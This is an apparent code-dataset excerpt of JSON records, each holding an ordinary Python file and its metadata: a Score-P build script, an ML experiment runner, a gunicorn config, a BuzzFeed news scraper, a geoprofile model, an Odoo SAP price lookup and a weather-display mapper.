{"api_name": "models.candidate.Candidate", "line_number": 48, "usage_type": "call"}, {"api_name": "models.employer.Employer", "line_number": 54, "usage_type": "call"}, {"api_name": "extensions.db.session.add", "line_number": 62, "usage_type": "call"}, {"api_name": "extensions.db.session", "line_number": 62, "usage_type": "attribute"}, {"api_name": "extensions.db", "line_number": 62, "usage_type": "name"}, {"api_name": "extensions.db.session.commit", "line_number": 63, "usage_type": "call"}, {"api_name": "extensions.db.session", "line_number": 63, "usage_type": "attribute"}, {"api_name": "extensions.db", "line_number": 63, "usage_type": "name"}, {"api_name": "flask_jwt_extended.create_access_token", "line_number": 65, "usage_type": "call"}, {"api_name": "flask.request.args.get", "line_number": 67, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 67, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 67, "usage_type": "name"}, {"api_name": "os.getenv", "line_number": 67, "usage_type": "call"}, {"api_name": "flask_jwt_extended.get_jwt_identity", "line_number": 77, "usage_type": "call"}, {"api_name": "models.user.User.query.filter_by", "line_number": 78, "usage_type": "call"}, {"api_name": "models.user.User.query", "line_number": 78, "usage_type": "attribute"}, {"api_name": "models.user.User", "line_number": 78, "usage_type": "name"}, {"api_name": "models.employer.Employer.query.filter_by", "line_number": 82, "usage_type": "call"}, {"api_name": "models.employer.Employer.query", "line_number": 82, "usage_type": "attribute"}, {"api_name": "models.employer.Employer", "line_number": 82, "usage_type": "name"}, {"api_name": "models.job_post.JobPost.query.filter_by", "line_number": 87, "usage_type": "call"}, {"api_name": "models.job_post.JobPost.query", "line_number": 87, "usage_type": "attribute"}, {"api_name": "models.job_post.JobPost", "line_number": 87, "usage_type": "name"}, {"api_name": 
"models.candidate.Candidate.query.filter_by", "line_number": 91, "usage_type": "call"}, {"api_name": "models.candidate.Candidate.query", "line_number": 91, "usage_type": "attribute"}, {"api_name": "models.candidate.Candidate", "line_number": 91, "usage_type": "name"}]}
+{"seq_id": "39749649765", "text": "import re\nimport setuptools\nimport subprocess\nimport sys\n\nif sys.version_info < (3, 5):\n sys.exit('Python 3.4 or older is not supported.')\n\n\ndef remove_flag3(x):\n return x[3:]\n\nldflags = subprocess.check_output([\"scorep-config\", \"--ldflags\"]).decode('utf-8')\ncflags = subprocess.check_output([\"scorep-config\", \"--cflags\"]).decode('utf-8')\n\nldflags = \" \" + ldflags\ncflags = \" \" + cflags\n\nscorep_include_dir = re.findall(\" -I[/+-@.\\w]*\", cflags)\nscorep_library_dir = re.findall(\" -L[/+-@.\\w]*\", ldflags)\n\nscorep_include_dir = list(map(remove_flag3, scorep_include_dir))[0]\nscorep_library_dir = list(map(remove_flag3, scorep_library_dir))[0]\n\nsetuptools.setup(name='scorep-cli-score',\n version='0.1',\n author='Marcel Achtert',\n author_email='marcel.achtert@tu-dresden.de',\n description='A Score-P-score based filter creation tool',\n url='https://github.com/score-p/scorep-score-gui',\n packages=['scorep_cli_score'],\n python_requires='~=3.5',\n scripts=['scorep_cli_score/scorep-cli-score'],\n classifiers=[\n 'Development Status :: 4 - Beta',\n 'Intended Audience :: Developers',\n 'Topic :: Software Development :: Build Tools',\n 'License :: OSI Approved :: BSD License 2.0',\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Python :: 3.5',\n 'Programming Language :: Python :: 3.6',\n 'Programming Language :: Python :: 3.7',\n ],\n ext_modules=[\n setuptools.Extension('bind',\n sources=['scorep_cli_score/bind.cpp'],\n include_dirs=[scorep_include_dir, '{}/cubelib'.format(scorep_include_dir)],\n library_dirs=[scorep_library_dir],\n libraries=['z', 'cube4', 'scorep_estimator'],\n language='c++'),\n setuptools.Extension('scorep_profile',\n sources=['scorep_cli_score/scorep_profile.cpp'],\n include_dirs=[scorep_include_dir, '{}/cubelib'.format(scorep_include_dir)],\n library_dirs=[scorep_library_dir],\n libraries=['z', 'cube4', 'scorep_estimator'],\n extra_compile_args=['-std=c++14'],\n language='c++'),\n ])\n", "repo_name": "score-p/scorep_cli_score", "sub_path": "setup.py", "file_name": "setup.py", "file_ext": "py", "file_size_in_byte": 2759, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "sys.version_info", "line_number": 6, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 7, "usage_type": "call"}, {"api_name": "subprocess.check_output", "line_number": 13, "usage_type": "call"}, {"api_name": "subprocess.check_output", "line_number": 14, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 19, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 20, "usage_type": "call"}, {"api_name": "setuptools.setup", "line_number": 25, "usage_type": "call"}, {"api_name": "setuptools.Extension", "line_number": 45, "usage_type": "call"}, {"api_name": "setuptools.Extension", "line_number": 51, "usage_type": "call"}]}
+{"seq_id": "7536964330", "text": "from collections import namedtuple\n\nimport GPy\n\nfrom gaussian_processes_variational.num_inducing_dimension_experiments import run_single_experiment\nfrom gaussian_processes_variational.parameter_containers import FixedParameterSettings\nfrom gaussian_processes_variational.simulation import RBFSimulator, LinearSimulator\n\n\ndef main():\n \"\"\"Run experiment for different datasets where a grid of number of inducings points and dimensions is explored.\"\"\"\n Experiment = namedtuple('Experiment', ['tag', 'simulator', 'kernel', 'dimensions', 'num_inducings'])\n n = 801\n inducing_points = [1, 2, 3, 4, 5, 10, 20, 50, 100, 200, 300, 400, n]\n dimensions = [1, 2, 3, 4, 5, 10, 15, 20]\n\n experiments = [\n # Experiment('rbf_fix_covariance', RBFSimulator, GPy.kern.RBF, dimensions, inducing_points),\n Experiment('linear_fix_covariance', LinearSimulator, GPy.kern.Linear, dimensions, inducing_points),\n ]\n opt_settings = FixedParameterSettings(fix_inducing_inputs=True)\n for experiment in experiments:\n run_single_experiment(experiment.tag, experiment.kernel, experiment.simulator, n, experiment.dimensions,\n experiment.num_inducings, opt_settings)\n\n\nif __name__ == \"__main__\":\n main()\n", "repo_name": "DAlkemade/gaussian_processes_variational", "sub_path": "experiment_fix_inducing_inputs.py", "file_name": "experiment_fix_inducing_inputs.py", "file_ext": "py", "file_size_in_byte": 1249, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "collections.namedtuple", "line_number": 12, "usage_type": "call"}, {"api_name": "gaussian_processes_variational.simulation.LinearSimulator", "line_number": 19, "usage_type": "argument"}, {"api_name": "GPy.kern", "line_number": 19, "usage_type": "attribute"}, {"api_name": "gaussian_processes_variational.parameter_containers.FixedParameterSettings", "line_number": 21, "usage_type": "call"}, {"api_name": "gaussian_processes_variational.num_inducing_dimension_experiments.run_single_experiment", "line_number": 23, "usage_type": "call"}]}
+{"seq_id": "7988456665", "text": "access_logfile = '-'\nerror_logfile = '-'\ngraceful_timeout = 60\nlog_file = '-'\nlog_level = 'info'\nlogger_class = 'safe_transaction_service.history.utils.CustomGunicornLogger'\ntimeout = 60\nworker_class = 'gevent'\nworker_connections = 2000\n\n\ndef post_fork(server, worker):\n try:\n from psycogreen.gevent import patch_psycopg\n patch_psycopg()\n worker.log.info(\"Made Psycopg2 Green\")\n except ImportError:\n worker.log.info(\"Psycopg2 not patched\")\n", "repo_name": "bigman1208000/safe-transaction-service", "sub_path": "gunicorn.conf.py", "file_name": "gunicorn.conf.py", "file_ext": "py", "file_size_in_byte": 474, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "psycogreen.gevent.patch_psycopg", "line_number": 15, "usage_type": "call"}]}
+{"seq_id": "72491990887", "text": "import os\nimport json\nimport datetime\nimport time\nimport argparse\n\nimport pytz\nfrom bs4 import BeautifulSoup\nfrom newspaper import Article\n\nfrom selenium import webdriver\nfrom selenium.common.exceptions import TimeoutException\n\n\nparser = argparse.ArgumentParser(\n description='A web scraper for Buzzfeed articles.')\n\nrequiredNamed = parser.add_argument_group('required arguments')\nrequiredNamed.add_argument('-q', '--query', type=str, required=True,\n help=\"Query string\")\n\nparser.add_argument('-l', '--link_file', type=str, default=\"\",\n help=\"Path to a newline-delimited file of article links \"\n \"to scrape\")\nparser.add_argument('-r', '--date_range', type=str, default=\"\",\n help=\"A space separated string of dates of the form \"\n \"'mm/dd/yyyy mm/dd/yyyy'. If this argument is not \"\n \"supplied, the scraper will default to searching \"\n \"Buzzfeed's recently tagged articles.\")\n\nparser.add_argument('--sleep_time', type=int, default=5,\n help=\"Time (in seconds) to wait between queries\")\nparser.add_argument('--page_timeout', type=int, default=30,\n help=\"Time (in seconds) after which we stop trying to load \"\n \"a page and retry\")\n\ndef parse_args(parser):\n args = parser.parse_args()\n QUERY = args.query\n QUERY = QUERY.replace(' ', '+')\n\n SLEEP_TIME = args.sleep_time\n PAGE_LOAD_TIMEOUT = args.page_timeout\n\n LINKS_FROM_FILE = False\n if len(args.link_file) > 0:\n LINKS_FROM_FILE = args.link_file\n\n dr = args.date_range\n if len(dr) > 0:\n FROM_LAST = dr.split(' ')\n else:\n FROM_LAST = None\n return QUERY, SLEEP_TIME, PAGE_LOAD_TIMEOUT, LINKS_FROM_FILE, FROM_LAST\n\n\ndef render(query_url):\n browser = webdriver.PhantomJS()\n browser.set_window_size(1120, 550)\n\n browser.implicitly_wait(PAGE_LOAD_TIMEOUT)\n browser.set_page_load_timeout(PAGE_LOAD_TIMEOUT)\n\n try:\n browser.get(query_url)\n html_source = browser.page_source\n browser.quit()\n return html_source\n\n except TimeoutException:\n print(\"\\t\\tRetrying page load after {}s timeout\".format(PAGE_LOAD_TIMEOUT))\n return render(query_url)\n\n\ndef gen_query_url(page_num=1):\n base_url = \"https://www.buzzfeed.com/tag\"\n content = \"{}?p={}\".format(QUERY, page_num)\n query_url = os.path.join(base_url, content)\n return query_url\n\n\ndef search_buzzfeed(query_url):\n result = render(query_url)\n soup = BeautifulSoup(result)\n return soup\n\n\ndef get_article_links(soup):\n base = \"https://www.buzzfeed.com\"\n hits = soup.findAll(\"article\")\n article_links = [hit.findAll(\"a\")[0].attrs['href'] for hit in hits]\n article_links = [base + link for link in article_links]\n return article_links\n\n\ndef get_archive_links(soup):\n base = \"https://www.buzzfeed.com\"\n hits = soup.findAll(\"ul\", class_=\"flow\")\n link_data = [(a.attrs['title'], a.contents[0], a.attrs['href']) for a in\n hits[0].findAll(\"a\")]\n\n links = []\n for lede, title, link in link_data:\n if QUERY.replace(\"+\", \" \").lower() in lede.lower():\n links.append(link)\n elif QUERY.replace(\"+\", \" \").lower() in title.lower():\n links.append(link)\n\n archive_links = [base + link for link in links]\n return archive_links\n\n\ndef date_range(start_date, end_date):\n for n in range(int((end_date - start_date).days) + 1):\n yield start_date + datetime.timedelta(n)\n\n\ndef gen_archive_url(yy, mm, dd):\n base_url = \"https://www.buzzfeed.com/archive/\"\n content = \"{}/{}/{}\".format(yy, mm, dd)\n query_url = os.path.join(base_url, content)\n return query_url\n\n\ndef 
search_buzzfeed_archive():\n    from_month, from_day, from_year = [int(i) for i in FROM_LAST[0].split('/')]\n    to_month, to_day, to_year = [int(i) for i in FROM_LAST[1].split('/')]\n\n    start_date = datetime.date(from_year, from_month, from_day)\n    end_date = datetime.date(to_year, to_month, to_day)\n\n    dates = []\n    for date in date_range(start_date, end_date):\n        dates.append([int(i) for i in date.strftime(\"%Y-%m-%d\").split('-')])\n\n    links = []\n    links_fp = './links/buzzfeed_links_{}_{}-{}.txt'\\\n        .format(QUERY,\n                datetime.datetime.strftime(start_date, \"%m%d%y\"),\n                datetime.datetime.strftime(end_date, \"%m%d%y\"))\n\n    for year, month, day in dates:\n        archive_url = gen_archive_url(year, month, day)\n\n        time.sleep(SLEEP_TIME)\n        soup = search_buzzfeed(archive_url)\n        new_links = get_archive_links(soup)\n\n        print(\"\\tFound {} article links for archive date {}\"\n              .format(len(new_links), \"{}/{}/{}\".format(month, day, year)))\n        links += new_links\n\n        with open(links_fp, 'a') as handle:\n            handle.write('\\n'.join(new_links) + \"\\n\")\n    return set(links)\n\n\ndef collect_links():\n    links = []\n    links_fp = './links/buzzfeed_links_{}.txt'.format(QUERY)\n\n    if not os.path.exists(\"./links\"):\n        os.makedirs(\"./links\")\n\n    # if user passes a date range, we have to search the buzzfeed\n    # archives rather than running a search query\n    if isinstance(FROM_LAST, list):\n        return search_buzzfeed_archive()\n\n    prev_page_empty = False\n    for idx in range(*PAGE_RANGE):\n        query_url = gen_query_url(idx)\n\n        time.sleep(SLEEP_TIME)\n        soup = search_buzzfeed(query_url)\n        new_links = get_article_links(soup)\n\n        print(\"\\tFound {} article links on page {} of query results\"\n              .format(len(new_links), idx))\n        links += new_links\n\n        # the most recent 2 pages are empty, we have run out of query pages!\n        if len(new_links) == 0:\n            if prev_page_empty:\n                return set(links)\n            else:\n                prev_page_empty = True\n        else:\n            prev_page_empty = False\n        with open(links_fp, 'a') as handle:\n            handle.write('\\n'.join(new_links) + \"\\n\")\n\n    return set(links)\n\n\ndef construct_article(link):\n    article = {\"url\": link}\n\n    article_obj = Article(url=link, language='en')\n    article_obj.download()\n    article_obj.parse()\n\n    authors = article_obj.authors\n    article['text'] = article_obj.text\n    article['title'] = article_obj.title\n    article['author'] = authors if len(authors) != 0 else None\n    article['urlToImage'] = None\n    article['description'] = article_obj.summary\n\n    article['publishedAt'] = None\n    article['before_election'] = None\n\n    if article_obj.publish_date:\n        date = tz.localize(article_obj.publish_date)\n        article['publishedAt'] = date.isoformat()\n        article['before_election'] = True if date < ELECTION_DATE else False\n    return article\n\n\ndef scrape_articles():\n    articles, links = [], []\n\n    print('\\n####### Buzzfeed Scraper #######')\n    print('Running query:')\n    if not FROM_LAST:\n        print('Scraping recent pages with the tag \"{}\"\\n'.format(QUERY))\n    else:\n        # use FROM_LAST here; args is local to parse_args and not visible in this scope\n        print('Scraping pages which contain \"{}\" from archives between '\n              '{} and {}\\n'.format(QUERY, *FROM_LAST))\n\n    if not LINKS_FROM_FILE:\n        links = collect_links()\n    else:\n        with open(LINKS_FROM_FILE, 'r') as handle:\n            for line in handle:\n                links.append(line.strip())\n\n    links = [i.strip() for i in set(links) if i.strip() != '']\n    print('\\nCollected {} links'.format(len(links)))\n\n    for idx, link in enumerate(links):\n        print('\\t{}. 
Scraping {}'.format(idx + 1, link))\n time.sleep(SLEEP_TIME) # for throttling\n article = construct_article(link)\n articles.append(article)\n\n data = {'articles': articles,\n 'source': 'buzzfeed',\n 'status': \"ok\",\n 'query': QUERY,\n 'from_last': None,\n 'pagerange': PAGE_RANGE}\n return data\n\n\ndef today():\n return datetime.datetime.strftime(datetime.datetime.now(), \"%m%d%y\")\n\n\ndef save_json(data, save_fp):\n if not os.path.exists(\"./scraped_json\"):\n os.makedirs(\"./scraped_json\")\n\n with open(save_fp, 'w') as handle:\n json.dump(data, handle, indent=4,\n sort_keys=True, separators=(',', ':'))\n\n\ndef main():\n date = today()\n data = scrape_articles()\n n = len(data['articles'])\n\n save_fp = \"./scraped_json/{}_{}_{}.json\".format('buzzfeed', date, n)\n print('Saving scraped articles to {}'.format(save_fp))\n save_json(data, save_fp)\n\n\nif __name__ == \"__main__\":\n tz = pytz.utc\n PAGE_RANGE = [1, 1000]\n ELECTION_DATE = datetime.datetime(2016, 11, 9, 11, tzinfo=tz)\n QUERY, SLEEP_TIME, PAGE_LOAD_TIMEOUT, LINKS_FROM_FILE, \\\n FROM_LAST = parse_args(parser)\n\n main()\n", "repo_name": "ddbourgin/news-scrapers", "sub_path": "buzzfeed.py", "file_name": "buzzfeed.py", "file_ext": "py", "file_size_in_byte": 8793, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4, "dataset": "github-code", "pt": "53", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 15, "usage_type": "call"}, {"api_name": "selenium.webdriver.PhantomJS", "line_number": 58, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 58, "usage_type": "name"}, {"api_name": "selenium.common.exceptions.TimeoutException", "line_number": 70, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 78, "usage_type": "call"}, {"api_name": "os.path", "line_number": 78, "usage_type": "attribute"}, {"api_name": "bs4.BeautifulSoup", "line_number": 84, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 115, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 121, "usage_type": "call"}, {"api_name": "os.path", "line_number": 121, "usage_type": "attribute"}, {"api_name": "datetime.date", "line_number": 129, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 130, "usage_type": "call"}, {"api_name": "datetime.datetime.strftime", "line_number": 139, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 139, "usage_type": "attribute"}, {"api_name": "datetime.datetime.strftime", "line_number": 140, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 140, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 145, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 162, "usage_type": "call"}, {"api_name": "os.path", "line_number": 162, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 163, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 174, "usage_type": "call"}, {"api_name": "newspaper.Article", "line_number": 199, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 243, "usage_type": "call"}, {"api_name": "datetime.datetime.strftime", "line_number": 257, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 257, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 257, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 261, "usage_type": "call"}, {"api_name": "os.path", "line_number": 261, "usage_type": "attribute"}, {"api_name": 
"os.makedirs", "line_number": 262, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 265, "usage_type": "call"}, {"api_name": "pytz.utc", "line_number": 280, "usage_type": "attribute"}, {"api_name": "datetime.datetime", "line_number": 282, "usage_type": "call"}]}
+{"seq_id": "29055917916", "text": "import random\nimport torchvision.transforms as transforms\n\nfrom PIL import ImageFilter, Image, ImageOps\n\n\n\nclass GaussianBlur(object):\n \"\"\"Gaussian blur augmentation in SimCLR https://arxiv.org/abs/2002.05709\"\"\"\n\n def __init__(self, sigma=[.1, 2.]):\n self.sigma = sigma\n\n def __call__(self, x):\n sigma = random.uniform(self.sigma[0], self.sigma[1])\n x = x.filter(ImageFilter.GaussianBlur(radius=sigma))\n return x\n\n\n\nmoco_aug = transforms.Compose([\n transforms.RandomResizedCrop(224, scale=(0.2, 1.)),\n transforms.RandomApply([transforms.ColorJitter(0.4, 0.4, 0.4, 0.1)], p=0.8),\n transforms.RandomGrayscale(p=0.2),\n transforms.RandomApply([GaussianBlur([.1, 2.])], p=0.5),\n transforms.RandomHorizontalFlip(),\n transforms.ToTensor(),\n transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])\n])\n\nsimclr_aug = transforms.Compose([\n transforms.RandomResizedCrop(224),\n transforms.RandomHorizontalFlip(),\n transforms.RandomApply([transforms.ColorJitter(0.8, 0.8, 0.8, 0.2)], p=0.8),\n transforms.RandomGrayscale(p=0.2),\n transforms.RandomApply([GaussianBlur([.1, 2.])], p=0.5),\n transforms.ToTensor(),\n transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])\n])\n\neval_aug = transforms.Compose([\n transforms.Resize(256),\n transforms.CenterCrop(224),\n transforms.ToTensor(),\n transforms.Normalize(mean=[0.485, 0.456, 0.406],\n std=[0.229, 0.224, 0.225]),\n])\n", "repo_name": "mingkai-zheng/WCL", "sub_path": "data/augmentation.py", "file_name": "augmentation.py", "file_ext": "py", "file_size_in_byte": 1511, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 30, "dataset": "github-code", "pt": "53", "api": [{"api_name": "random.uniform", "line_number": 15, "usage_type": "call"}, {"api_name": "PIL.ImageFilter.GaussianBlur", "line_number": 16, "usage_type": "call"}, {"api_name": "PIL.ImageFilter", "line_number": 16, "usage_type": "name"}, {"api_name": "torchvision.transforms.Compose", "line_number": 21, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 21, "usage_type": "name"}, {"api_name": "torchvision.transforms.RandomResizedCrop", "line_number": 22, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 22, "usage_type": "name"}, {"api_name": "torchvision.transforms.RandomApply", "line_number": 23, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 23, "usage_type": "name"}, {"api_name": "torchvision.transforms.ColorJitter", "line_number": 23, "usage_type": "call"}, {"api_name": "torchvision.transforms.RandomGrayscale", "line_number": 24, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 24, "usage_type": "name"}, {"api_name": "torchvision.transforms.RandomApply", "line_number": 25, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 25, "usage_type": "name"}, {"api_name": "torchvision.transforms.RandomHorizontalFlip", "line_number": 26, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 26, "usage_type": "name"}, {"api_name": "torchvision.transforms.ToTensor", "line_number": 27, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 27, "usage_type": "name"}, {"api_name": "torchvision.transforms.Normalize", "line_number": 28, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 28, "usage_type": "name"}, {"api_name": "torchvision.transforms.Compose", "line_number": 31, 
"usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 31, "usage_type": "name"}, {"api_name": "torchvision.transforms.RandomResizedCrop", "line_number": 32, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 32, "usage_type": "name"}, {"api_name": "torchvision.transforms.RandomHorizontalFlip", "line_number": 33, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 33, "usage_type": "name"}, {"api_name": "torchvision.transforms.RandomApply", "line_number": 34, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 34, "usage_type": "name"}, {"api_name": "torchvision.transforms.ColorJitter", "line_number": 34, "usage_type": "call"}, {"api_name": "torchvision.transforms.RandomGrayscale", "line_number": 35, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 35, "usage_type": "name"}, {"api_name": "torchvision.transforms.RandomApply", "line_number": 36, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 36, "usage_type": "name"}, {"api_name": "torchvision.transforms.ToTensor", "line_number": 37, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 37, "usage_type": "name"}, {"api_name": "torchvision.transforms.Normalize", "line_number": 38, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 38, "usage_type": "name"}, {"api_name": "torchvision.transforms.Compose", "line_number": 41, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 41, "usage_type": "name"}, {"api_name": "torchvision.transforms.Resize", "line_number": 42, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 42, "usage_type": "name"}, {"api_name": "torchvision.transforms.CenterCrop", "line_number": 43, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 43, "usage_type": "name"}, {"api_name": "torchvision.transforms.ToTensor", "line_number": 44, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 44, "usage_type": "name"}, {"api_name": "torchvision.transforms.Normalize", "line_number": 45, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 45, "usage_type": "name"}]}
+{"seq_id": "31527769676", "text": "__author__ = \"Breinbaas | Rob van Putten\"\n__copyright__ = \"Copyright 2020\"\n__credits__ = [\"Rob van Putten\"]\n__license__ = \"GPL\"\n__version__ = \"0.1.0\"\n__maintainer__ = \"Rob van Putten\"\n__email__ = \"breinbaasnl@gmail.com\"\n__status__ = \"Development\"\n\nfrom pydantic import BaseModel\nfrom typing import List\nimport numpy as np\n\nimport matplotlib.pyplot as plt\nimport matplotlib.gridspec as gridspec\nimport matplotlib.patches as patches\n\nfrom .psoilprofile import PSoilprofile\nfrom .pointrd import PointRD\nfrom ..settings import HDSR_SOIL_COLORS\n\n# same here.. should (with more time) split it in some parent / child relation because\n# we are almost copying the normal Geoprofile.. so not neat, but effective for now\nclass PGeoprofile(BaseModel):\n id: str = \"\" # id van het dijktraject\n name: str = \"\" # naam van het dijktraject\n points: List[PointRD] = [] # referentielijn\n soilprofiles: List[PSoilprofile] = [] # gevonden grondprofielen\n\n @property\n def x_left(self):\n if len(self.soilprofiles) > 0:\n return min([sp.x_left for sp in self.soilprofiles])\n raise ValueError(\"Trying to get xleft from an empty geoprofile\")\n\n @property\n def x_right(self):\n if len(self.soilprofiles) > 0:\n return max([sp.x_right for sp in self.soilprofiles])\n raise ValueError(\"Trying to get xright from an empty geoprofile\")\n\n @property\n def z_top(self) -> float:\n if len(self.soilprofiles) > 0:\n return max([sp.z_top for sp in self.soilprofiles])\n raise ValueError(\"Trying to get ztop from an empty geoprofile\")\n\n @property\n def z_bottom(self) -> float:\n if len(self.soilprofiles) > 0:\n return min([sp.z_bottom for sp in self.soilprofiles])\n raise ValueError(\"Trying to get zbottom from an empty geoprofile\")\n\n def get_xy_from_l_on_refline(self, l):\n for i in range(1,len(self.points)):\n p1 = self.points[i-1]\n p2 = self.points[i]\n\n if p1.chainage <= l and l <= p2.chainage:\n x = p1.x + (l - p1.chainage) / (p2.chainage - p1.chainage) * (p1.x - p2.x)\n y = p1.y + (l - p1.chainage) / (p2.chainage - p1.chainage) * (p1.y - p2.y)\n return x, y\n\n raise ValueError(f\"Could not find xy for chainage {l}; min chainage = {self.points[0].chainage}, max chainage = {self.points[-1].chainage}\")\n \n \n def get_partial_refline(self, chainage_start: int, chainage_end: int):\n result = []\n points = np.linspace(chainage_start, chainage_end, int((chainage_end - chainage_start) / 10.) + 1)\n for p in points:\n result.append(self.get_xy_from_l_on_refline(p))\n\n return result\n\n \n def to_dam_input(self, segmentid: int, shapeinput) -> int:\n pass\n \n def plot(self, filename: str) -> None:\n pass", "repo_name": "breinbaas/geoprofielen", "sub_path": "geoprofielen/objects/pgeoprofile.py", "file_name": "pgeoprofile.py", "file_ext": "py", "file_size_in_byte": 2853, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pydantic.BaseModel", "line_number": 24, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 27, "usage_type": "name"}, {"api_name": "pointrd.PointRD", "line_number": 27, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 28, "usage_type": "name"}, {"api_name": "psoilprofile.PSoilprofile", "line_number": 28, "usage_type": "name"}, {"api_name": "numpy.linspace", "line_number": 69, "usage_type": "call"}]}
+{"seq_id": "708504241", "text": "from odoo import models, api\r\nfrom urllib.request import urlopen\r\nfrom xml.dom.minidom import parseString\r\nimport json\r\nfrom urllib.parse import urlencode\r\nfrom odoo.exceptions import Warning\r\n\r\n\r\nclass GAProductIntegration(models.Model):\r\n _inherit = 'sale.order.line'\r\n\r\n @api.multi\r\n @api.onchange('product_id')\r\n def product_uom_change(self):\r\n\r\n if self.product_id:\r\n if self.product_id.default_code:\r\n #super(GAProductIntegration, self).product_id_change()\r\n res = super(GAProductIntegration, self).product_uom_change()\r\n data = {'ItemCode': self.product_id.default_code, 'Zone': self.order_id.partner_id.zone_id.code}\r\n url = \"http://sap.stile.com.pk/api/api/demo?\"\r\n content = urlopen(url + urlencode(data)).read()\r\n self.price_unit = parseString(json.loads(str(content, 'utf-8'))).getElementsByTagName('Price')[0].childNodes[0].data\r\n return res\r\n\r\n GAProductIntegration()\r\n\r\n", "repo_name": "MuhammadFaizan1996/abc", "sub_path": "GA_SAP_Integration/model/product.py", "file_name": "product.py", "file_ext": "py", "file_size_in_byte": 1027, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "odoo.models.Model", "line_number": 9, "usage_type": "attribute"}, {"api_name": "odoo.models", "line_number": 9, "usage_type": "name"}, {"api_name": "urllib.request.urlopen", "line_number": 22, "usage_type": "call"}, {"api_name": "urllib.parse.urlencode", "line_number": 22, "usage_type": "call"}, {"api_name": "xml.dom.minidom.parseString", "line_number": 23, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 23, "usage_type": "call"}, {"api_name": "odoo.api.multi", "line_number": 12, "usage_type": "attribute"}, {"api_name": "odoo.api", "line_number": 12, "usage_type": "name"}, {"api_name": "odoo.api.onchange", "line_number": 13, "usage_type": "call"}, {"api_name": "odoo.api", "line_number": 13, "usage_type": "name"}]}
+{"seq_id": "21015265862", "text": "import time\nfrom data.utils.indicator_mapper import Indicator_Data_Map\nfrom data.current_conditions import NOAA_Current_Observation\n\n\nclass Current_Obs_Mapper(Indicator_Data_Map):\n \"\"\" Mapper for current observation from NOAA \"\"\"\n\n def __init__(self, station):\n\n self._noaa_current_obs = NOAA_Current_Observation(station)\n self.init()\n\n self[\"icon_name\"] = \"sunny\"\n self[\"icon_color\"] = \"#FFFF00\"\n self[\"line1\"] = self.temp_str\n self[\"line2\"] = lambda: time.strftime(\n \"%I:%M\", time.localtime()).lstrip(\"0\")\n self[\"line3\"] = lambda: self._noaa_current_obs[\"weather\"]\n\n def temp_str(self):\n \"\"\"\n Returns the temperature with decimal point dropped\n \"\"\"\n\n try:\n temp = \"%iF\" % int(float(self._noaa_current_obs[\"temp_f\"]))\n except:\n temp = \"\"\n\n return temp\n", "repo_name": "mattgrogan/ledmatrix", "sub_path": "ledmatrix/data/mappers/current_obs.py", "file_name": "current_obs.py", "file_ext": "py", "file_size_in_byte": 812, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "data.utils.indicator_mapper.Indicator_Data_Map", "line_number": 6, "usage_type": "name"}, {"api_name": "data.current_conditions.NOAA_Current_Observation", "line_number": 11, "usage_type": "call"}, {"api_name": "time.strftime", 